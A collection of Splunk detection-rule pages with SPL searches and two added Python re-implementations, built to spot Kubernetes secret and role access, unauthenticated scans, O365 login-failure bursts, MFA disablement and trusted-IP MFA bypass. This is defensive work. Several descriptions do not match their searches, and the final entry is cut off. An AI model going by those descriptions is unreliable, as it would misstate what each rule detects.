Search

`o365_management_activity` Operation=UserLoginFailed record_type=AzureActiveDirectoryStsLogon app=AzureActiveDirectory | stats count dc(user) as accounts_locked values(user) as user values(LogonError) as LogonError values(authentication_method) as authentication_method values(signature) as signature values(UserAgent) as UserAgent by src_ip record_type Operation app | search accounts_locked >= 5 | `high_number_of_login_failures_from_a_single_source_filter`

Associated Analytic Story


How To Implement

Required field

ATT&CK

ID          Technique           Tactic
T1110.001   Password Guessing   Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

unknown

Reference

Test Dataset

version: 1


Kubernetes aws detect rbac authorization by account

This search provides information on Kubernetes RBAC authorizations by account. The search can be modified by adding top to see both extremes of RBAC occurrences by account.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-06-23

Search

`aws_cloudwatchlogs_eks` annotations.authorization.k8s.io/reason=* | table sourceIPs{} user.username userAgent annotations.authorization.k8s.io/reason | stats count by user.username annotations.authorization.k8s.io/reason | rare user.username annotations.authorization.k8s.io/reason |`kubernetes_aws_detect_rbac_authorization_by_account_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with CloudWatch logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Not all RBAC authorizations are malicious. RBAC authorizations can uncover malicious activity, especially if sensitive roles have been granted.

Reference

Test Dataset

version: 1


Kubernetes aws detect most active service accounts by pod

This search provides information on Kubernetes service accounts accessing pods, by IP address, verb and decision.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-06-23

Search

`aws_cloudwatchlogs_eks` user.groups{}=system:serviceaccounts objectRef.resource=pods | table sourceIPs{} user.username userAgent verb annotations.authorization.k8s.io/decision | top sourceIPs{} user.username verb annotations.authorization.k8s.io/decision |`kubernetes_aws_detect_most_active_service_accounts_by_pod_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with CloudWatch logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Not all service account interactions are malicious. Analysts must consider IP, verb and decision context when trying to detect malicious activity.

Reference

Test Dataset

version: 1


Kubernetes aws detect sensitive role access

This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-06-23

Search

`aws_cloudwatchlogs_eks` objectRef.resource=clusterroles OR clusterrolebindings sourceIPs{}!=::1 sourceIPs{}!=127.0.0.1 | table sourceIPs{} user.username user.groups{} objectRef.namespace requestURI annotations.authorization.k8s.io/reason | dedup user.username user.groups{} |`kubernetes_aws_detect_sensitive_role_access_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with CloudWatch logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Sensitive role resource access is necessary for cluster operation; however, source IP, namespace and user group may indicate possible malicious use.

Reference

Test Dataset

version: 1


Kubernetes aws detect service accounts forbidden failure access

This search provides information on Kubernetes service accounts with failure or forbidden access status. The search can be extended with the top or rare operators to find trends or rarities in failure status, user agents, source IPs and request URIs.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-06-23

Search

`aws_cloudwatchlogs_eks` user.groups{}=system:serviceaccounts responseStatus.status = Failure | table sourceIPs{} user.username userAgent verb responseStatus.status requestURI | `kubernetes_aws_detect_service_accounts_forbidden_failure_access_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with CloudWatch logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

This search can give false positives, as there might be inherent issues with authentication and permissions in the cluster.

Reference

Test Dataset

version: 1


Kubernetes aws detect suspicious kubectl calls

This search provides information on anonymous kubectl calls, with IP, verb, namespace and object access context.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-06-23

Search

`aws_cloudwatchlogs_eks` userAgent=kubectl* sourceIPs{}!=127.0.0.1 sourceIPs{}!=::1 src_user=system:anonymous | table src_ip src_user verb userAgent requestURI | stats count by src_ip src_user verb userAgent requestURI |`kubernetes_aws_detect_suspicious_kubectl_calls_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with CloudWatch logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Kubectl calls are not malicious by nature. However, source IP, verb and object can reveal potentially malicious activity, especially anonymous calls from suspicious IPs against sensitive objects such as configmaps or secrets.

Reference

Test Dataset

version: 1


Kubernetes azure detect rbac authorization by account

This search provides information on Kubernetes RBAC authorizations by account. The search can be modified by adding rare or top to see both extremes of RBAC occurrences by account.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-05-26

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | search annotations.authorization.k8s.io/reason=* | table sourceIPs{} user.username userAgent annotations.authorization.k8s.io/reason |stats count by user.username annotations.authorization.k8s.io/reason | rare user.username annotations.authorization.k8s.io/reason |`kubernetes_azure_detect_rbac_authorization_by_account_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and configure kube-audit data diagnostics.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Not all RBAC authorizations are malicious. RBAC authorizations can uncover malicious activity, especially if sensitive roles have been granted.

Reference

Test Dataset

version: 1


Kubernetes azure detect most active service accounts by pod namespace

This search provides information on Kubernetes service accounts accessing pods and namespaces, by IP address and verb.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-05-26

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | search user.groups{}=system:serviceaccounts* OR user.username=system.anonymous OR annotations.authorization.k8s.io/decision=allow | table sourceIPs{} user.username userAgent verb responseStatus.reason responseStatus.status properties.pod objectRef.namespace | top sourceIPs{} user.username verb responseStatus.status properties.pod objectRef.namespace |`kubernetes_azure_detect_most_active_service_accounts_by_pod_namespace_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and configure kube-audit data diagnostics.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Not all service account interactions are malicious. Analysts must consider IP and verb context when trying to detect malicious activity.

Reference

Test Dataset

version: 1


Kubernetes azure detect sensitive object access

This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-05-20

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | search objectRef.resource=secrets OR configmaps user.username=system.anonymous OR annotations.authorization.k8s.io/decision=allow |table user.username user.groups{} objectRef.resource objectRef.namespace objectRef.name annotations.authorization.k8s.io/reason |dedup user.username user.groups{} |`kubernetes_azure_detect_sensitive_object_access_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and configure kube-audit data diagnostics.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Sensitive object access is not necessarily malicious but user and object context can provide guidance for detection.

Reference

Test Dataset

version: 1


Kubernetes azure detect sensitive role access

This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-05-20

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | search objectRef.resource=clusterroles OR clusterrolebindings | table sourceIPs{} user.username user.groups{} objectRef.namespace requestURI annotations.authorization.k8s.io/reason | dedup user.username user.groups{} |`kubernetes_azure_detect_sensitive_role_access_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and configure kube-audit data diagnostics.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Sensitive role resource access is necessary for cluster operation; however, source IP, namespace and user group may indicate possible malicious use.

Reference

Test Dataset

version: 1


Kubernetes azure detect service accounts forbidden failure access

This search provides information on Kubernetes service accounts with failure or forbidden access status.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-05-20

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | search user.groups{}=system:serviceaccounts* responseStatus.reason=Forbidden | table sourceIPs{} user.username userAgent verb responseStatus.reason responseStatus.status properties.pod objectRef.namespace |`kubernetes_azure_detect_service_accounts_forbidden_failure_access_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and configure kube-audit data diagnostics.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

This search can give false positives, as there might be inherent issues with authentication and permissions in the cluster.

Reference

Test Dataset

version: 1


Kubernetes azure detect suspicious kubectl calls

This search provides information on rare kubectl calls, with IP, verb, namespace and object access context.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-05-26

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | spath input=responseObject.metadata.annotations.kubectl.kubernetes.io/last-applied-configuration | search userAgent=kubectl* sourceIPs{}!=127.0.0.1 sourceIPs{}!=::1 | table sourceIPs{} verb userAgent user.groups{} objectRef.resource objectRef.namespace requestURI | rare sourceIPs{} verb userAgent user.groups{} objectRef.resource objectRef.namespace requestURI |`kubernetes_azure_detect_suspicious_kubectl_calls_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and configure kube-audit data diagnostics.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Kubectl calls are not malicious by nature. However, source IP, verb and object can reveal potentially malicious activity, especially calls from suspicious IPs against sensitive objects such as configmaps or secrets.

Reference

Test Dataset

version: 1


Kubernetes azure pod scan fingerprint

This search provides information on unauthenticated requests against Kubernetes cluster pods in Azure, with source IP, user agent, request URI and response status data.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-05-20

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | search responseStatus.code=401 | table sourceIPs{} userAgent verb requestURI responseStatus.reason properties.pod |`kubernetes_azure_pod_scan_fingerprint_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and configure kube-audit data diagnostics.

Required field

Kill Chain Phase

  • Reconnaissance


Known False Positives

Not all unauthenticated requests are malicious, but source IPs, userAgent, verb, request URI and response status will provide context.

Reference

Test Dataset

version: 1


Kubernetes azure scan fingerprint

This search provides information on unauthenticated requests against a Kubernetes cluster in Azure, with source IP, user agent, request URI and response status data.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1526
  • Last Updated: 2020-05-19

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | search responseStatus.code=401 | table sourceIPs{} userAgent verb requestURI responseStatus.reason |`kubernetes_azure_scan_fingerprint_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and configure kube-audit data diagnostics.

Required field

ATT&CK

ID      Technique                 Tactic
T1526   Cloud Service Discovery   Discovery


Kill Chain Phase

  • Reconnaissance


Known False Positives

Not all unauthenticated requests are malicious, but source IPs, userAgent, verb, request URI and response status will provide context.
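The Azure pod scan fingerprint and scan fingerprint searches above, like the GCP Kubernetes cluster pod scan detection, all follow the same shape: unwrap the audit event carried in properties.log (the `spath input=properties.log` step), keep the responses with HTTP status 401, and lay out source IP, user agent, verb, request URI and reason so an analyst can judge frequency and origin. The following is an added example, not code from the Splunk Security Content project, that performs that decoding in Python over constructed Azure-style diagnostic records and rolls the 401 rows up per source IP and user agent, which is the context the Known False Positives note says you need. The record envelope, IP addresses (documentation ranges), user agent strings and URIs are all constructed; it also assumes that a detection must skip malformed lines, other diagnostic categories and events lacking a responseStatus rather than fail on them.

```python
"""Added example: decoding kube-audit diagnostic records (the `spath input=properties.log`
step), keeping HTTP 401 responses and rolling them up by source IP and user agent."""
import json
from collections import defaultdict


def parse_kube_audit_line(line):
    """Return the embedded kube-audit event for a kube-audit diagnostic record, else None.
    Malformed JSON, a missing properties.log or another category are skipped rather than
    raised, since a scheduled detection must survive junk in the log stream."""
    try:
        record = json.loads(line)
        if record.get("category") != "kube-audit":
            return None
        return json.loads(record["properties"]["log"])
    except (ValueError, KeyError, TypeError):
        return None


def unauthenticated_requests(lines):
    """`search responseStatus.code=401 | table sourceIPs{} userAgent verb requestURI responseStatus.reason`,
    then one row per (source IP, user agent) with the count and the distinct verbs, URIs and reasons."""
    rows = defaultdict(lambda: {"count": 0, "verbs": set(), "uris": set(), "reasons": set()})
    for line in lines:
        event = parse_kube_audit_line(line)
        if event is None:
            continue
        status = event.get("responseStatus") or {}
        if status.get("code") != 401:
            continue
        for ip in event.get("sourceIPs", []):          # multivalue field sourceIPs{}
            row = rows[(ip, event.get("userAgent", ""))]
            row["count"] += 1
            row["verbs"].add(event.get("verb", ""))
            row["uris"].add(event.get("requestURI", ""))
            row["reasons"].add(status.get("reason", ""))
    return dict(rows)


def azure_record(audit_event, category="kube-audit"):
    """Wrap an audit event the way it arrives from Azure diagnostics: the kube-audit JSON
    is itself a string inside properties.log (constructed envelope, not a captured record)."""
    return json.dumps({"category": category, "properties": {"log": json.dumps(audit_event)}})


def constructed_lines():
    """Constructed sample lines: an anonymous scanner probing three URIs, one anonymous
    kubectl call, an allowed request, a forbidden request, a non-audit record and junk."""
    def ev(ip, ua, verb, uri, code, reason):
        return {"sourceIPs": [ip], "userAgent": ua, "verb": verb, "requestURI": uri,
                "user": {"username": "system:anonymous"},
                "responseStatus": {"code": code, "reason": reason}}
    scanner = "constructed-scanner/1.0"   # hypothetical user agent string
    return [
        azure_record(ev("203.0.113.5", scanner, "get", "/api/v1/pods", 401, "Unauthorized")),
        azure_record(ev("203.0.113.5", scanner, "get", "/healthz", 401, "Unauthorized")),
        azure_record(ev("203.0.113.5", scanner, "get", "/version", 401, "Unauthorized")),
        azure_record(ev("198.51.100.9", "kubectl/v1.19.0", "list", "/api/v1/namespaces", 401, "Unauthorized")),
        azure_record(ev("10.0.0.4", "kubelet/v1.19.0", "get", "/api/v1/nodes", 200, "")),
        azure_record(ev("10.0.0.4", "kubectl/v1.19.0", "create", "/api/v1/pods", 403, "Forbidden")),
        azure_record({"msg": "not an audit event"}, category="kube-controller-manager"),
        "this line is not JSON",
    ]


if __name__ == "__main__":
    for (ip, ua), row in sorted(unauthenticated_requests(constructed_lines()).items()):
        print(f"{ip:14} {ua:24} count={row['count']} uris={sorted(row['uris'])}")
```

Grouping by source IP and user agent turns the three scanner probes into a single row with count 3 and three distinct URIs, while the lone anonymous kubectl call stays a separate row; the 403 from an authenticated client is deliberately left out because it belongs to the forbidden/failure searches, not the scan fingerprint.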

Reference

Test Dataset

version: 1


Kubernetes gcp detect rbac authorizations by account

This search provides information on Kubernetes RBAC authorizations by account. The search can be modified by adding top to see both extremes of RBAC occurrences by account.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-07-11

Search

`google_gcp_pubsub_message` data.labels.authorization.k8s.io/reason=ClusterRoleBinding OR Clusterrole | table src_ip src_user data.labels.authorization.k8s.io/decision data.labels.authorization.k8s.io/reason | rare src_user data.labels.authorization.k8s.io/reason |`kubernetes_gcp_detect_rbac_authorizations_by_account_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for GCP. This search works with Pub/Sub messaging service logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Not all RBAC authorizations are malicious. RBAC authorizations can uncover malicious activity, especially if sensitive roles have been granted.

Reference

Test Dataset

version: 1


Kubernetes gcp detect most active service accounts by pod

This search provides information on Kubernetes service accounts accessing pods, by IP address, verb and decision.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-07-10

Search

`google_gcp_pubsub_message` data.protoPayload.request.spec.group{}=system:serviceaccounts | table src_ip src_user http_user_agent data.protoPayload.request.spec.nonResourceAttributes.verb data.labels.authorization.k8s.io/decision data.protoPayload.response.spec.resourceAttributes.resource | top src_ip src_user http_user_agent data.labels.authorization.k8s.io/decision data.protoPayload.response.spec.resourceAttributes.resource |`kubernetes_gcp_detect_most_active_service_accounts_by_pod_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for GCP. This search works with Pub/Sub messaging service logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Not all service account interactions are malicious. Analysts must consider IP, verb and decision context when trying to detect malicious activity.

Reference

Test Dataset

version: 1


Kubernetes gcp detect sensitive object access

This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-07-11

Search

`google_gcp_pubsub_message` data.protoPayload.authorizationInfo{}.resource=configmaps OR secrets | table data.protoPayload.requestMetadata.callerIp src_user data.resource.labels.cluster_name data.protoPayload.request.metadata.namespace data.labels.authorization.k8s.io/decision | dedup data.protoPayload.requestMetadata.callerIp src_user data.resource.labels.cluster_name |`kubernetes_gcp_detect_sensitive_object_access_filter`

Associated Analytic Story


How To Implement

You must install the Splunk add-on for GCP. This search works with Pub/Sub messaging service logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Sensitive object access is not necessarily malicious but user and object context can provide guidance for detection.

Reference

Test Dataset

version: 1


Kubernetes gcp detect sensitive role access

This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-07-11

Search

`google_gcp_pubsub_message` data.labels.authorization.k8s.io/reason=ClusterRoleBinding OR Clusterrole dest=apis/rbac.authorization.k8s.io/v1 src_ip!=::1 | table src_ip src_user http_user_agent data.labels.authorization.k8s.io/decision data.labels.authorization.k8s.io/reason | dedup src_ip src_user |`kubernetes_gcp_detect_sensitive_role_access_filter`

Associated Analytic Story


How To Implement

You must install the Splunk add-on for GCP. This search works with Pub/Sub messaging service logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Sensitive role resource access is necessary for cluster operation; however, the source IP, user agent, decision and reason may indicate possible malicious use.

Reference

Test Dataset

version: 1


Kubernetes gcp detect service accounts forbidden failure access

This search provides information on Kubernetes service accounts with a failure or forbidden access status. It can be extended with the top or rare operators to find trends or rarities in failure status, user agents, source IPs and request URIs.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-06-23

Search

`google_gcp_pubsub_message` system:serviceaccounts data.protoPayload.response.status.allowed!=* | table src_ip src_user http_user_agent data.protoPayload.response.spec.resourceAttributes.namespace data.resource.labels.cluster_name data.protoPayload.response.spec.resourceAttributes.verb data.protoPayload.request.status.allowed data.protoPayload.response.status.reason data.labels.authorization.k8s.io/decision | dedup src_ip src_user | `kubernetes_gcp_detect_service_accounts_forbidden_failure_access_filter`

Associated Analytic Story


How To Implement

You must install the Splunk add-on for GCP. This search works with Pub/Sub messaging service logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

This search can give false positives, as there might be inherent authentication and permission issues at the cluster level.

Reference

Test Dataset

version: 1


Kubernetes gcp detect suspicious kubectl calls

This search provides information on anonymous kubectl calls, with IP, verb, namespace and object access context.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-07-11

Search

`google_gcp_pubsub_message` data.protoPayload.requestMetadata.callerSuppliedUserAgent=kubectl* src_user=system:unsecured OR src_user=system:anonymous | table src_ip src_user data.protoPayload.requestMetadata.callerSuppliedUserAgent data.protoPayload.authorizationInfo{}.granted object_path |dedup src_ip src_user |`kubernetes_gcp_detect_suspicious_kubectl_calls_filter`

Associated Analytic Story


How To Implement

You must install the Splunk add-on for GCP. This search works with Pub/Sub messaging logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

kubectl calls are not malicious by nature. However, the source IP, source user, user agent, object path and authorization context can reveal potentially malicious activity, especially anonymous calls from suspicious IPs and access to sensitive objects such as configmaps or secrets.

Reference

Test Dataset

version: 1


New container uploaded to aws ecr

This search shows information on uploaded containers, including source user, image id, source IP, user type, HTTP user agent, region, and the first and last time of the operation (PutImage). It is based on the Cloud Infrastructure data model.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1525
  • Last Updated: 2020-02-20

Search

| tstats count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Cloud_Infrastructure.Compute where Compute.user_type!="AssumeRole" AND Compute.http_user_agent="AWS Internal" AND Compute.event_name="PutImage" by Compute.image_id Compute.src_user Compute.src Compute.region Compute.msg Compute.user_type | `drop_dm_object_name("Compute")` | `new_container_uploaded_to_aws_ecr_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. You must also install the Cloud Infrastructure data model. Please also customize the `container_implant_aws_detection_filter` macro to filter out the false positives.

Required field

ATT&CK

ID Technique Tactic
T1525 Implant Container Image Persistence


Kill Chain Phase

Known False Positives

Uploading container is a normal behavior from developers or users with access to container registry.

Reference

Test Dataset

version: 1


O365 add app role assignment grant user

This search detects the creation of a new Federation setting by alerting on a specific event related to its creation.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1136.003
  • Last Updated: 2021-01-26

Search

`o365_management_activity` Workload=AzureActiveDirectory Operation="Add app role assignment grant to user." | stats count min(_time) as firstTime max(_time) as lastTime values(Actor{}.ID) as Actor.ID values(Actor{}.Type) as Actor.Type by ActorIpAddress dest ResultStatus | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_add_app_role_assignment_grant_user_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for Microsoft Office 365. This search works with o365:management:activity logs.

Required field

ATT&CK

ID Technique Tactic
T1136.003 Cloud Account Persistence


Kill Chain Phase

  • Actions on Objective


Known False Positives

The creation of a new Federation is not necessarily malicious; however, these events need to be followed closely, as they may indicate federated credential abuse or a backdoor via federated identities at a different cloud provider.

Reference


Test Dataset


version: 1


O365 added service principal

This search detects the creation of a new Federation setting by alerting on a specific event related to its creation.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1136.003
  • Last Updated: 2021-01-26

Search

`o365_management_activity` Workload=AzureActiveDirectory signature="Add service principal credentials." | stats min(_time) as firstTime max(_time) as lastTime values(Actor{}.ID) as Actor.ID values(ModifiedProperties{}.Name) as ModifiedProperties.Name values(ModifiedProperties{}.NewValue) as ModifiedProperties.NewValue values(Target{}.ID) as Target.ID by ActorIpAddress signature | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_added_service_principal_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for Microsoft Office 365. This search works with o365:management:activity logs.

Required field

ATT&CK

ID Technique Tactic
T1136.003 Cloud Account Persistence


Kill Chain Phase

  • Actions on Objective


Known False Positives

The creation of a new Federation is not necessarily malicious; however, these events need to be followed closely, as they may indicate federated credential abuse or a backdoor via federated identities at a different cloud provider.

Reference


Test Dataset


version: 1


O365 bypass mfa via trusted ip

This search detects IP addresses/CIDR blocks newly added to the list of MFA Trusted IPs, which bypass multi-factor authentication. Attackers are known to use this technique to bypass the MFA system.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1562.007
  • Last Updated: 2021-01-12

Search

`o365_management_activity` signature="Set Company Information." ModifiedProperties{}.Name=StrongAuthenticationPolicy | rex max_match=100 field=ModifiedProperties{}.NewValue "(?<ip_addresses_new_added>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\/\d{1,2})" | rex max_match=100 field=ModifiedProperties{}.OldValue "(?<ip_addresses_old>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\/\d{1,2})" | eval ip_addresses_old=if(isnotnull(ip_addresses_old),ip_addresses_old,"0") | mvexpand ip_addresses_new_added | where isnull(mvfind(ip_addresses_old,ip_addresses_new_added)) |stats count min(_time) as firstTime max(_time) as lastTime values(ip_addresses_old) as ip_addresses_old by user ip_addresses_new_added signature vendor_product vendor_account status user_id action | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_bypass_mfa_via_trusted_ip_filter`
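The core of this search is the comparison between the OldValue and NewValue of the StrongAuthenticationPolicy property: only CIDRs that appear in the new list but not the old one are reported. The following Python is an added example (not part of Splunk Security Content) that reproduces that comparison over constructed o365:management:activity records so the logic can be checked offline. The sample events and the field names used for them (Operation, UserId, ClientIP, ModifiedProperties) are assumptions about the raw record layout, not values taken from this page.

```python
import re
from typing import Dict, List

# Same IPv4 CIDR pattern the detection's two rex commands extract.
CIDR_RE = re.compile(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/\d{1,2}")


def extract_cidrs(value) -> List[str]:
    """Pull every IPv4 CIDR out of a property value. A missing value yields an
    empty list (the SPL substitutes "0" for a missing OldValue, which matches nothing)."""
    return CIDR_RE.findall(value or "")


def newly_trusted_ranges(event: dict) -> List[str]:
    """CIDRs present in NewValue but absent from OldValue of the
    StrongAuthenticationPolicy property of a "Set Company Information." event.
    This mirrors `where isnull(mvfind(ip_addresses_old, ip_addresses_new_added))`,
    but compares exact strings instead of treating the new CIDR as a regex."""
    if event.get("Operation") != "Set Company Information.":
        return []
    for prop in event.get("ModifiedProperties", []):
        if prop.get("Name") != "StrongAuthenticationPolicy":
            continue
        old = set(extract_cidrs(prop.get("OldValue")))
        new = extract_cidrs(prop.get("NewValue"))
        # keep order, drop duplicates already seen in the new list
        return [c for i, c in enumerate(new) if c not in old and c not in new[:i]]
    return []


def detect_trusted_ip_additions(events) -> List[Dict[str, str]]:
    """One finding per (user, newly added CIDR), like the SPL's
    `stats ... by user ip_addresses_new_added`."""
    findings = []
    for ev in events:
        for cidr in newly_trusted_ranges(ev):
            findings.append({"user": ev.get("UserId"),
                             "src_ip": ev.get("ClientIP"),
                             "cidr": cidr})
    return findings


# Constructed sample events (not real tenant data). The field names are an
# assumption about the raw o365:management:activity record layout.
SAMPLE_EVENTS = [
    {   # one range added to an existing list -> one finding
        "Operation": "Set Company Information.",
        "UserId": "admin@example.com",
        "ClientIP": "203.0.113.10",
        "ModifiedProperties": [{
            "Name": "StrongAuthenticationPolicy",
            "OldValue": "TrustedIpRanges: 198.51.100.0/24",
            "NewValue": "TrustedIpRanges: 198.51.100.0/24 192.0.2.0/24",
        }],
    },
    {   # first-ever trusted range, no OldValue at all -> finding
        "Operation": "Set Company Information.",
        "UserId": "helpdesk@example.com",
        "ClientIP": "203.0.113.11",
        "ModifiedProperties": [{
            "Name": "StrongAuthenticationPolicy",
            "OldValue": None,
            "NewValue": "TrustedIpRanges: 203.0.113.0/24",
        }],
    },
    {   # same operation but an unrelated property -> ignored
        "Operation": "Set Company Information.",
        "UserId": "admin@example.com",
        "ClientIP": "203.0.113.10",
        "ModifiedProperties": [{"Name": "Company.DisplayName",
                                "OldValue": "A", "NewValue": "B"}],
    },
]

if __name__ == "__main__":
    for finding in detect_trusted_ip_additions(SAMPLE_EVENTS):
        print(finding)
```

The exact-string comparison is deliberately stricter than the SPL's mvfind, which interprets each new CIDR as a regular expression; in practice both agree for well-formed CIDRs, and the stricter form avoids a dot matching any character.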

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for Microsoft Office 365. This search works with o365:management:activity logs.

Required field

ATT&CK

ID Technique Tactic
T1562.007 Disable or Modify Cloud Firewall Defense Evasion


Kill Chain Phase

  • Actions on Objective


Known False Positives

Unless it is a special case, it is uncommon to continually update the Trusted IPs in the MFA configuration.

Reference


Test Dataset


version: 1


O365 disable mfa

This search detects when multi-factor authentication has been disabled, which entity performed the action, and against which user.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1556
  • Last Updated: 2020-12-16

Search

`o365_management_activity` Operation="Disable Strong Authentication." | stats count earliest(_time) as firstTime latest(_time) as lastTime by UserType Operation user status signature dest ResultStatus |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `o365_disable_mfa_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for Microsoft Office 365. This search works with o365:management:activity logs.

Required field

ATT&CK

ID Technique Tactic
T1556 Modify Authentication Process Credential Access, Defense Evasion


Kill Chain Phase

  • Actions on Objective


Known False Positives

Unless it is a special case, it is uncommon to disable MFA or Strong Authentication.

Reference


Test Dataset


version: 1


O365 excessive authentication failures alert

This search detects when an excessive number of authentication failures occur. It also includes failed attempts against MFA prompt codes.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1110
  • Last Updated: 2020-12-16

Search

